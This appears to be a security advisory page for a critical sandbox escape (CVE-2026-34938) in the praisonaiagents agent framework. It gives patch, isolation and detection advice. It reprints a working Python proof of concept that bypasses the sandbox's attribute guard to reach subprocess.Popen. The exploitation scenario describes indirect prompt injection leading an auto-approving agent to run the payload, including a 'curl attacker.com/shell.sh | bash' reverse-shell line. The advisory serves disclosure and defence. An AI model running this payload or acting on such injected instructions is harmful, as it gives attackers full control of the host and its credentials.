CVE-2026-34938: praisonaiagents: sandbox bypass enables full host RCE
GHSA-6vh2-h83c-9294 CRITICAL CISA: ATTENDPatch praisonaiagents to 1.5.90 immediately — this is a CVSS 10 sandbox escape that delivers unauthenticated OS command execution with no user interaction required. Any deployment using execute_code() is fully compromised, and the default PRAISONAI_AUTO_APPROVE=true in bot/autonomy modes means indirect prompt injection silently triggers RCE without human confirmation. Until patched, disable or sandbox any agent pipeline that invokes execute_code().
What is the risk?
Maximum exploitability: CVSS 10 with network vector, zero privileges, no user interaction, and scope change (C:H/I:H/A:H). The public PoC lowers exploitation bar to script-kiddie level post-disclosure. PraisonAI is a widely-used multi-agent orchestration framework in enterprise AI pipelines; exposure is broad. Auto-approval defaults dramatically amplify blast radius — a single indirect prompt injection in a document, email, or web result processed by the agent is sufficient to achieve code execution with no human in the loop.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| PraisonAI Agents | pip | <= 1.5.89 | 1.5.90 |
Do you use PraisonAI Agents? You're affected.
How severe is it?
What is the attack surface?
What should I do?
6 steps-
PATCH NOW
Upgrade praisonaiagents to >= 1.5.90 (pip install --upgrade praisonaiagents).
-
DISABLE AUTO-APPROVE: Remove or override PRAISONAI_AUTO_APPROVE=true in all bot/autonomy deployments.
-
ISOLATE
Run any agent with code execution capability in a dedicated container or VM with no access to sensitive credentials, internal networks, or host filesystem.
-
LEAST PRIVILEGE
Ensure the process user running the agent has minimal OS permissions.
-
DETECT
Log and alert on any invocation of execute_code() — look for __subclasses__, Popen, subprocess, or FakeStr patterns in code payloads.
-
AUDIT
Review agent tool definitions and restrict execute_code() to trusted, human-reviewed inputs only.
What does CISA's SSVC say?
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2026-34938?
Patch praisonaiagents to 1.5.90 immediately — this is a CVSS 10 sandbox escape that delivers unauthenticated OS command execution with no user interaction required. Any deployment using execute_code() is fully compromised, and the default PRAISONAI_AUTO_APPROVE=true in bot/autonomy modes means indirect prompt injection silently triggers RCE without human confirmation. Until patched, disable or sandbox any agent pipeline that invokes execute_code().
Is CVE-2026-34938 actively exploited?
No confirmed active exploitation of CVE-2026-34938 has been reported, but organizations should still patch proactively.
How to fix CVE-2026-34938?
1. PATCH NOW: Upgrade praisonaiagents to >= 1.5.90 (pip install --upgrade praisonaiagents). 2. DISABLE AUTO-APPROVE: Remove or override PRAISONAI_AUTO_APPROVE=true in all bot/autonomy deployments. 3. ISOLATE: Run any agent with code execution capability in a dedicated container or VM with no access to sensitive credentials, internal networks, or host filesystem. 4. LEAST PRIVILEGE: Ensure the process user running the agent has minimal OS permissions. 5. DETECT: Log and alert on any invocation of execute_code() — look for __subclasses__, Popen, subprocess, or FakeStr patterns in code payloads. 6. AUDIT: Review agent tool definitions and restrict execute_code() to trusted, human-reviewed inputs only.
What systems are affected by CVE-2026-34938?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, agentic pipelines with code execution tools, RAG pipelines with autonomous agents, multi-agent orchestration systems, AI-powered automation bots.
What is the CVSS score for CVE-2026-34938?
CVE-2026-34938 has a CVSS v3.1 base score of 10.0 (CRITICAL). The EPSS exploitation probability is 0.71%.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0010.001 AI Software AML.T0049 Exploit Public-Facing Application AML.T0050 Command and Scripting Interpreter AML.T0051.001 Indirect AML.T0053 AI Agent Tool Invocation AML.T0072 Reverse Shell AML.T0105 Escape to Host Compliance Controls Affected
What are the technical details?
Original Advisory
### Summary `execute_code()` in `praisonai-agents` runs attacker-controlled Python inside a three-layer sandbox that can be fully bypassed by passing a `str` subclass with an overridden `startswith()` method to the `_safe_getattr` wrapper, achieving arbitrary OS command execution on the host. ### Details `python_tools.py:20` (source) -> `python_tools.py:22` (guard bypass) -> `python_tools.py:161` (sink) ```python # source -- _safe_getattr accepts any str subclass def _safe_getattr(obj, name, *default): if isinstance(name, str) and name.startswith('_'): # isinstance passes for subclasses raise AttributeError(...) # hop -- type() is whitelisted in safe_builtins, creates str subclass without class keyword FakeStr = type('FakeStr', (str,), {'startswith': lambda self, *a: False}) # sink -- Popen reached via __subclasses__ walk r = Popen(['id'], stdout=PIPE, stderr=PIPE) ``` ### PoC ```python from praisonaiagents.tools.python_tools import execute_code payload = """ t = type FakeStr = t('FakeStr', (str,), {'startswith': lambda self, *a: False}) mro_attr = FakeStr(''.join(['_','_','m','r','o','_','_'])) subs_attr = FakeStr(''.join(['_','_','s','u','b','c','l','a','s','s','e','s','_','_'])) mod_attr = FakeStr(''.join(['_','_','m','o','d','u','l','e','_','_'])) name_attr = FakeStr(''.join(['_','_','n','a','m','e','_','_'])) PIPE = -1 obj_class = getattr(type(()), mro_attr)[1] for cls in getattr(obj_class, subs_attr)(): try: m = getattr(cls, mod_attr, '') n = getattr(cls, name_attr, '') if m == 'subprocess' and n == 'Popen': r = cls(['id'], stdout=PIPE, stderr=PIPE) out, err = r.communicate() print('RCE:', out.decode()) break except Exception as e: print('ERR:', e) """ result = execute_code(code=payload) print(result) # expected output: RCE: uid=1000(narey) gid=1000(narey) groups=1000(narey)... ``` ### Impact Any user or agent pipeline running `execute_code()` is exposed to full OS command execution as the process user. Deployments using `bot.py`, `autonomy_mode.py`, or `bots_cli.py` set `PRAISONAI_AUTO_APPROVE=true` by default, meaning no human confirmation is required and the tool fires silently when triggered via indirect prompt injection.
Exploitation Scenario
An attacker embeds a malicious prompt in a publicly accessible document or web page that an autonomous PraisonAI agent crawls as part of its workflow (indirect prompt injection). The injected prompt instructs the agent to call execute_code() with the PoC payload. Because PRAISONAI_AUTO_APPROVE=true is default in autonomy_mode.py, the agent executes the payload silently — no human confirmation dialog appears. The payload walks Python's __subclasses__ chain to reach subprocess.Popen, executes 'curl attacker.com/shell.sh | bash', and establishes a reverse shell. From there, the attacker pivots to any credentials, APIs, or data sources accessible to the agent process.
Weaknesses (CWE)
CWE-693 — Protection Mechanism Failure: The product does not use or incorrectly uses a protection mechanism that provides sufficient defense against directed attacks against the product.
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H References
Timeline
Related Vulnerabilities
CVE-2026-39888 10.0 praisonaiagents: sandbox escape enables host RCE
Same package: praisonaiagents CVE-2026-47392 9.9 praisonaiagents: RCE via Python sandbox bypass
Same package: praisonaiagents GHSA-vc46-vw85-3wvm 9.8 PraisonAI: RCE via malicious workflow YAML execution
Same package: praisonaiagents CVE-2026-47391 9.8 PraisonAI: Unauth RCE via A2A eval injection
Same package: praisonaiagents GHSA-892r-p3jq-jp24 9.8 PraisonAI AgentOS: unauth remote agent invocation (CVSS 9.8)
Same package: praisonaiagents